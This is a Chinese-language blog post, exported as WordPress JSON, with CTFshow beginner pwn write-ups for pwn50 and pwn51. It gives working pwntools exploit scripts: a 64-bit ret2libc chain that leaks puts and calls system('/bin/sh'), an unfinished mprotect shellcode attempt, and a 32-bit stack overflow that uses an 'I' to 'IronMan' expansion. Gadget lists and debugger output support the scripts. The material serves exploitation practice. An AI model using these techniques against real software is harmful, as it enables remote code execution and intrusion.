{"id":263,"date":"2025-02-10T14:06:39","date_gmt":"2025-02-10T06:06:39","guid":{"rendered":"https:\/\/www.okabe.xin\/?p=263"},"modified":"2025-02-10T14:06:39","modified_gmt":"2025-02-10T06:06:39","slug":"pwn%ef%bc%9fbang%ef%bc%9fbangdream%ef%bc%81","status":"publish","type":"post","link":"https:\/\/www.okabe.xin\/wordpress\/?p=263","title":{"rendered":"pwn\uff1fbang\uff1fbangdream\uff01"},"content":{"rendered":"\n

pwn50<\/h2>\n\n\n\n
[*] 'C:\\\\Users\\\\26597\\\\Desktop\\\\pwn50'
    Arch:       amd64-64-little
    RELRO:      Partial RELRO
    Stack:      No canary found
    NX:         NX enabled
    PIE:        No PIE (0x400000)
    Stripped:   No<\/code><\/pre>\n\n\n\n
\u770b\u5230puts\u51fd\u6570<\/p>\n\n\n\n
\u63d0\u793alibc\u7248\u672c<\/p>\n\n\n\n
\u731c\u662fret2libc\u768464\u4f4d<\/p>\n\n\n\n
\u5957\u677f\u5b50<\/p>\n\n\n\n
exp\uff1a<\/p>\n\n\n\n
from pwn import *
from LibcSearcher import *
\u200b
io = remote('pwn.challenge.ctf.show',28119)
#io=process(\".\/pwn50\")
elf = ELF('.\/pwn50')
# libc= ELF(elf.libc.path)
\u200b
ret_add =0x00000000004004fe
pop_rdi =0x00000000004007e3
main_add =0x0000000000400745
puts_got = elf.got['puts']
puts_plt = elf.plt['puts']
\u200b
print(\"Puts_got: \",hex(puts_got))
print(\"Puts_plt: \",hex(puts_plt))
\u200b
offset=0x20
\u200b
payload1 = b'a' * (offset+8) + p64(pop_rdi) + p64(puts_got) + p64(puts_plt) + p64(main_add)
io.sendlineafter(b'Hello CTFshow', payload1)
puts_addr = u64(io.recvuntil(b'\\x7f')[-6:].ljust(8,b'\\x00'))
print(\"Puts_addr: \",hex(puts_addr))
\u200b
libc = LibcSearcher('puts',puts_addr)   # libc6_2.27-0ubuntu2_amd64
\u200b
libc_base = puts_addr - libc.dump('puts')
system_add = libc_base + libc.dump('system')
bin_sh_add = libc_base + libc.dump('str_bin_sh')
\u200b
# libc_base = puts_addr - libc.symbols['puts']
# system_add = libc_base + libc.symbols['system']
# bin_sh_add = libc_base + next(libc.search(b'\/bin\/sh'))
\u200b
payload2 = b'a' * (offset+8) + p64(ret_add) + p64(pop_rdi) + p64(bin_sh_add) + p64(system_add)
\u200b
io.sendlineafter(b'Hello CTFshow', payload2)
\u200b
io.interactive()<\/code><\/pre>\n\n\n\n
\u8fd9\u91cc\u6211\u6709\u4e2a\u5f88\u5947\u602a\u7684\u70b9\uff0cexp\u62ff\u5230\u4e86flag\u4f46\u662f\u5b8c\u5168\u6ca1\u529e\u6cd5\u4ea4\u4e92\uff08orz\uff0c\u83ab\u540d\u6709\u79cd\u90aa\u9053\u901f\u901a\u306e\u611f\u89c9<\/p>\n\n\n\n
\u8c8c\u4f3c\u8fd8\u53ef\u4ee5\u6253mprotect<\/p>\n\n\n\n
mprotect<\/h3>\n\n\n\n
pwndbg> disass mprotect
Dump of assembler code for function mprotect:
   0x00007ffff7afd7e0 <+0>: mov    eax,0xa
   0x00007ffff7afd7e5 <+5>: syscall 
   0x00007ffff7afd7e7 <+7>: cmp    rax,0xfffffffffffff001
   0x00007ffff7afd7ed <+13>:    jae    0x7ffff7afd7f0 <mprotect+16>
   0x00007ffff7afd7ef <+15>:    ret    
   0x00007ffff7afd7f0 <+16>:    mov    rcx,QWORD PTR [rip+0x2cf671]        # 0x7ffff7dcce68
   0x00007ffff7afd7f7 <+23>:    neg    eax
   0x00007ffff7afd7f9 <+25>:    mov    DWORD PTR fs:[rcx],eax
   0x00007ffff7afd7fc <+28>:    or     rax,0xffffffffffffffff
   0x00007ffff7afd800 <+32>:    ret    
End of assembler dump.<\/code><\/pre>\n\n\n\n
\u627e\u5230mprotect\u51fd\u6570\u4f4d\u7f6e<\/p>\n\n\n\n
\u627e\u5bc4\u5b58\u5668\u4f4d\u7f6e<\/p>\n\n\n\n
0x00000000004007dc : pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
0x00000000004007de : pop r13 ; pop r14 ; pop r15 ; ret
0x00000000004007e0 : pop r14 ; pop r15 ; ret
0x00000000004007e2 : pop r15 ; ret
0x0000000000400634 : pop rbp ; jmp 0x4005c0
0x00000000004005ab : pop rbp ; mov edi, 0x602048 ; jmp rax
0x00000000004007db : pop rbp ; pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
0x00000000004007df : pop rbp ; pop r14 ; pop r15 ; ret
0x00000000004005b8 : pop rbp ; ret
0x00000000004007e3 : pop rdi ; ret
0x00000000004007e1 : pop rsi ; pop r15 ; ret
0x00000000004007dd : pop rsp ; pop r13 ; pop r14 ; pop r15 ; ret<\/code><\/pre>\n\n\n\n
pop\u76f8\u5173\u7684\u5730\u5740\u5c31\u8fd9\u4e9b<\/p>\n\n\n\n
\u627e\u4e09\u4e2apop\u5e26\u4e2aret\u5373\u53ef<\/p>\n\n\n\n
0x00000000004007e0 \u5373\u4e3a\u8fd4\u56de\u5730\u5740<\/p>\n\n\n\n
\u73b0\u5728\u518d\u53bb\u627egot\u8868\u7684\u4f4d\u7f6e<\/p>\n\n\n\n
Section Headers:
  [Nr] Name              Type             Address           Offset
       Size              EntSize          Flags  Link  Info  Align
  [ 0]                   NULL             0000000000000000  00000000
       0000000000000000  0000000000000000           0     0     0
  [ 1] .interp           PROGBITS         0000000000400238  00000238
       000000000000001c  0000000000000000   A       0     0     1
  [ 2] .note.ABI-tag     NOTE             0000000000400254  00000254
       0000000000000020  0000000000000000   A       0     0     4
  [ 3] .note.gnu.build-i NOTE             0000000000400274  00000274
       0000000000000024  0000000000000000   A       0     0     4
  [ 4] .gnu.hash         GNU_HASH         0000000000400298  00000298
       0000000000000028  0000000000000000   A       5     0     8
  [ 5] .dynsym           DYNSYM           00000000004002c0  000002c0
       00000000000000d8  0000000000000018   A       6     1     8
  [ 6] .dynstr           STRTAB           0000000000400398  00000398
       000000000000005c  0000000000000000   A       0     0     1
  [ 7] .gnu.version      VERSYM           00000000004003f4  000003f4
       0000000000000012  0000000000000002   A       5     0     2
  [ 8] .gnu.version_r    VERNEED          0000000000400408  00000408
       0000000000000020  0000000000000000   A       6     1     8
  [ 9] .rela.dyn         RELA             0000000000400428  00000428
       0000000000000060  0000000000000018   A       5     0     8
  [10] .rela.plt         RELA             0000000000400488  00000488
       0000000000000060  0000000000000018  AI       5    22     8
  [11] .init             PROGBITS         00000000004004e8  000004e8
       0000000000000017  0000000000000000  AX       0     0     4
  [12] .plt              PROGBITS         0000000000400500  00000500
       0000000000000050  0000000000000010  AX       0     0     16
  [13] .text             PROGBITS         0000000000400550  00000550
       00000000000002a2  0000000000000000  AX       0     0     16
  [14] .fini             PROGBITS         00000000004007f4  000007f4
       0000000000000009  0000000000000000  AX       0     0     4
  [15] .rodata           PROGBITS         0000000000400800  00000800
       000000000000053f  0000000000000000   A       0     0     8
  [16] .eh_frame_hdr     PROGBITS         0000000000400d40  00000d40
       0000000000000054  0000000000000000   A       0     0     4
  [17] .eh_frame         PROGBITS         0000000000400d98  00000d98
       0000000000000160  0000000000000000   A       0     0     8
  [18] .init_array       INIT_ARRAY       0000000000601e10  00001e10
       0000000000000008  0000000000000008  WA       0     0     8
  [19] .fini_array       FINI_ARRAY       0000000000601e18  00001e18
       0000000000000008  0000000000000008  WA       0     0     8
  [20] .dynamic          DYNAMIC          0000000000601e20  00001e20
       00000000000001d0  0000000000000010  WA       6     0     8
  [21] .got              PROGBITS         0000000000601ff0  00001ff0
       0000000000000010  0000000000000008  WA       0     0     8
  [22] .got.plt          PROGBITS         0000000000602000  00002000
       0000000000000038  0000000000000008  WA       0     0     8
  [23] .data             PROGBITS         0000000000602038  00002038
       0000000000000010  0000000000000000  WA       0     0     8
  [24] .bss              NOBITS           0000000000602050  00002048
       0000000000000020  0000000000000000  WA       0     0     16
  [25] .comment          PROGBITS         0000000000000000  00002048
       0000000000000029  0000000000000001  MS       0     0     1
  [26] .symtab           SYMTAB           0000000000000000  00002078
       0000000000000678  0000000000000018          27    43     8
  [27] .strtab           STRTAB           0000000000000000  000026f0
       0000000000000239  0000000000000000           0     0     1
  [28] .shstrtab         STRTAB           0000000000000000  00002929
       0000000000000103  0000000000000000           0     0     1
Key to Flags:
  W (write), A (alloc), X (execute), M (merge), S (strings), I (info),
  L (link order), O (extra OS processing required), G (group), T (TLS),
  C (compressed), x (unknown), o (OS specific), E (exclude),
  l (large), p (processor specific)<\/code><\/pre>\n\n\n\n
\u4f4d\u7f6e\u4e3a\uff1a0x0000000000602000<\/p>\n\n\n\n
\u627e\u5230\u7c7bread\u51fd\u6570gets<\/p>\n\n\n\n
0000000000400657<\/p>\n\n\n\n
\u6700\u540e\u6539\u51fa\u6765\u7684exp\u8fd0\u884c\u4ea4\u4e92\u6ca1\u7ed3\u679c\uff0c\u7591\u60d1<\/p>\n\n\n\n
\u4e4b\u540e\u518d\u6765\u4ed4\u7ec6\u7814\u7a76<\/p>\n\n\n\n
\u5f85\u6539exp\uff1a<\/p>\n\n\n\n
# -*- coding: UTF-8 -*-
from pwn import *
u=remote(\"pwn.challenge.ctf.show\",28162)
shellcode = asm(shellcraft.sh(),arch='i386',os='linux')
payload = b'a'*(0x20+8)
payload += p64(0x00007ffff7afd7e0) # mprotect\u51fd\u6570\u5730\u5740
payload += p64(0x00000000004007e0) # 3 pop 1 ret\u5730\u5740
payload += p64(0x0000000000602000) # \u9700\u8981\u4fee\u6539\u7684\u5185\u5b58\u7684\u8d77\u59cb\u5730\u5740
payload += p64(0x1000) # \u4fee\u6539\u5185\u5b58\u7a7a\u95f4\u7684\u5927\u5c0f
payload += p64(0x7) # \u9700\u8981\u8d4b\u4e88\u7684\u6743\u9650
payload += p64(0x806bee0) # gets\u51fd\u6570\u5730\u5740
payload += p64(0x0000000000602000) # gets\u51fd\u6570\u8fd4\u56de\u5730\u5740(\u5c31\u662f\u6211\u4eecshellcode\u6240\u5728\u5730\u5740,\u5373\u6211\u4eec\u4fee\u6539\u7684\u5185\u5b58\u7a7a\u95f4\u7684\u8d77\u59cb\u5730\u5740)
payload += p64(0x0000000000602000) # shellcode\u5730\u5740
payload += p64(len(shellcode))
u.sendline(payload)
u.sendline(shellcode)
u.interactive()<\/code><\/pre>\n\n\n\n
pwn51<\/h2>\n\n\n\n
32\u4f4d<\/p>\n\n\n\n
\u53cd\u7f16\u8bd1\u540e\u50bb\u773c\u4e86<\/p>\n\n\n\n
\u662fC++<\/p>\n\n\n\n
\u770b\u4e0d\u592a\u61c2\uff0c\u9760\u7740string\u754c\u9762\u627e\u5230\u4e86\u4e3b\u8981\u51fd\u6570sub_8049059<\/p>\n\n\n\n
int sub_8049059()
{
  int v0; \/\/ eax
  int v1; \/\/ eax
  unsigned int v2; \/\/ eax
  int v3; \/\/ eax
  const char *v4; \/\/ eax
  int v6; \/\/ [esp-Ch] [ebp-84h]
  int v7; \/\/ [esp-8h] [ebp-80h]
  _BYTE v8[12]; \/\/ [esp+0h] [ebp-78h] BYREF
  char s[32]; \/\/ [esp+Ch] [ebp-6Ch] BYREF
  _BYTE v10[24]; \/\/ [esp+2Ch] [ebp-4Ch] BYREF
  _BYTE v11[24]; \/\/ [esp+44h] [ebp-34h] BYREF
  unsigned int i; \/\/ [esp+5Ch] [ebp-1Ch]
\u200b
  memset(s, 0, sizeof(s));
  puts(\"Who are you?\");
  read(0, s, 0x20u);
  std::string::operator=(&unk_804D0A0, &unk_804A350);
  std::string::operator+=(&unk_804D0A0, s);
  std::string::basic_string(v10, &unk_804D0B8);
  std::string::basic_string(v11, &unk_804D0A0);
  sub_8048F06(v8);
  std::string::~string(v11, v11, v10);
  std::string::~string(v10, v6, v7);
  if ( sub_80496D6(v8) > 1u )
  {
    std::string::operator=(&unk_804D0A0, &unk_804A350);
    v0 = sub_8049700(v8, 0);
    if ( (unsigned __int8)sub_8049722(v0, &unk_804A350) )
    {
      v1 = sub_8049700(v8, 0);
      std::string::operator+=(&unk_804D0A0, v1);
    }
    for ( i = 1; ; ++i )
    {
      v2 = sub_80496D6(v8);
      if ( v2 <= i )
        break;
      std::string::operator+=(&unk_804D0A0, \"IronMan\");
      v3 = sub_8049700(v8, i);
      std::string::operator+=(&unk_804D0A0, v3);
    }
  }
  v4 = (const char *)std::string::c_str(&unk_804D0A0);
  strcpy(s, v4);
  printf(\"Wow!you are:%s\", s);
  return sub_8049616(v8);
}<\/code><\/pre>\n\n\n\n
\u521d\u7565\u7406\u89e3\u4e4b\u4e0b\uff0c\u77e5\u9053s\u5c31\u662f\u8981\u6ea2\u51fa\u7684\u5bf9\u8c61\uff0c\u8ba4\u4e3a\u504f\u79fb\u503c\u5c31\u662fchar s[32]; \/\/ [esp+Ch] [ebp-6Ch] BYREF\uff0c\u4e5f\u5c31\u662f0x6C+4<\/p>\n\n\n\n
string\u754c\u9762\u8fd8\u80fd\u627e\u5230\u4e00\u6761system\u6307\u4ee4<\/p>\n\n\n\n
int sub_804902E()
{
  return system(\"cat \/ctfshow_flag\");
}<\/code><\/pre>\n\n\n\n
\u521d\u6b65\u5c1d\u8bd5\u5931\u8d25\uff0c\u867d\u7136\u770b\u7740\u5e94\u8be5\u6ca1\u4ec0\u4e48\u95ee\u9898<\/p>\n\n\n\n
\u4f46\u662f\u8c8c\u4f3c\u6709\u9650\u5236\u8f93\u5165<\/p>\n\n\n\n
\u6240\u4ee5\u5c1d\u8bd5\u8f93\u51650x6C+4\u7684\u2018a\u2019\u5c31\u6ca1\u529e\u6cd5\u8f93\u51fa\u591f<\/p>\n\n\n\n
\u770bWP\u624d\u77e5\u9053\u4e3b\u51fd\u6570\u91cc\u9762\u4f1a\u628aI\u6362\u6210IronMan<\/p>\n\n\n\n
16\u4e2aI\u7684\u8f93\u5165\u5c31\u80fd\u521a\u521a\u597d\u53d8\u6210112\u5b57\u8282IronMan\uff0c\u5b8c\u6210\u6ea2\u51fa\u6548\u679c<\/p>\n\n\n\n
\u7136\u540e\u540e\u7eed\u8ddf\u4e00\u4e2asystem\u51fd\u6570\u4f4d\u7f6e\u5c31\u597d\u4e86<\/p>\n\n\n\n
exp\uff1a<\/p>\n\n\n\n
from pwn import *
u=remote(\"pwn.challenge.ctf.show\",28223)
payload=b'I'*16+p32(0x0804902E)
#payload=b'I'*16+p32(0x08049042)
u.sendline(payload)
u.interactive()<\/code><\/pre>\n\n\n\n
\u6b64\u4e8b\u5728\u76f4\u63a5\u672c\u5730\u8fd0\u884c\u4ea6\u6709\u8bb0\u8f7d\uff08<\/p>\n\n\n\n
ctfshow@ubuntu:~\/Desktop\/xd\/LibcSearcher$ .\/pwn51
    \u2584\u2584\u2584\u2584   \u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584  \u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584            \u2584\u2584                           
  \u2588\u2588\u2580\u2580\u2580\u2580\u2588  \u2580\u2580\u2580\u2588\u2588\u2580\u2580\u2580  \u2588\u2588\u2580\u2580\u2580\u2580\u2580\u2580            \u2588\u2588                           
 \u2588\u2588\u2580          \u2588\u2588     \u2588\u2588        \u2584\u2584\u2588\u2588\u2588\u2588\u2588\u2584  \u2588\u2588\u2584\u2588\u2588\u2588\u2588\u2584   \u2584\u2588\u2588\u2588\u2588\u2584  \u2588\u2588      \u2588\u2588
 \u2588\u2588           \u2588\u2588     \u2588\u2588\u2588\u2588\u2588\u2588\u2588   \u2588\u2588\u2584\u2584\u2584\u2584 \u2580  \u2588\u2588\u2580   \u2588\u2588  \u2588\u2588\u2580  \u2580\u2588\u2588 \u2580\u2588  \u2588\u2588  \u2588\u2580
 \u2588\u2588\u2584          \u2588\u2588     \u2588\u2588         \u2580\u2580\u2580\u2580\u2588\u2588\u2584  \u2588\u2588    \u2588\u2588  \u2588\u2588    \u2588\u2588  \u2588\u2588\u2584\u2588\u2588\u2584\u2588\u2588 
  \u2588\u2588\u2584\u2584\u2584\u2584\u2588     \u2588\u2588     \u2588\u2588        \u2588\u2584\u2584\u2584\u2584\u2584\u2588\u2588  \u2588\u2588    \u2588\u2588  \u2580\u2588\u2588\u2584\u2584\u2588\u2588\u2580  \u2580\u2588\u2588  \u2588\u2588\u2580 
    \u2580\u2580\u2580\u2580      \u2580\u2580     \u2580\u2580         \u2580\u2580\u2580\u2580\u2580\u2580   \u2580\u2580    \u2580\u2580    \u2580\u2580\u2580\u2580     \u2580\u2580  \u2580\u2580  
    * *************************************                           
    * Classify: CTFshow --- PWN --- \u5165\u95e8                              
    * Type  : Stack_Overflow                                          
    * Site  : https:\/\/ctf.show\/                                       
    * Hint  : Who are you?                                            
    * *************************************                           
Who are you?
I
Wow!you are:IronMan<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"
pwn50 \u770b\u5230puts\u51fd\u6570 \u63d0\u793alibc\u7248\u672c \u731c\u662fret2libc\u768464\u4f4d \u5957\u677f\u5b50 exp\uff1a \u8fd9\u91cc\u6211\u6709\u4e2a\u5f88\u5947 […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[],"class_list":["post-263","post","type-post","status-publish","format-standard","hentry","category-ctf"],"_links":{"self":[{"href":"https:\/\/www.okabe.xin\/wordpress\/index.php?rest_route=\/wp\/v2\/posts\/263","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.okabe.xin\/wordpress\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.okabe.xin\/wordpress\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.okabe.xin\/wordpress\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.okabe.xin\/wordpress\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=263"}],"version-history":[{"count":0,"href":"https:\/\/www.okabe.xin\/wordpress\/index.php?rest_route=\/wp\/v2\/posts\/263\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.okabe.xin\/wordpress\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=263"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.okabe.xin\/wordpress\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=263"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.okabe.xin\/wordpress\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=263"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}